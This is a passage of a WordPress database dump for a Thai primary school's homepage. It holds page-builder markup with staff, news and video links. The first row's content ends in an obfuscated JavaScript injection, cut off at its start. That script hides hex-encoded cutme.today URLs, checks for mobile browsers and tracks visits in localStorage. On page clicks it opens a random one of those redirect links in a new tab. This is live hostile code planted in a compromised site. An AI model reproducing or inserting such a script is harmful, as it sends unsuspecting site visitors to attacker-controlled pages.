_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-27 12:17:35','2024-08-27 05:17:35','',19,'http://watprato.ssk.in.th/?p=228',0,'revision','',0),
(229,2,'2024-08-27 12:18:19','2024-08-27 05:18:19','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a 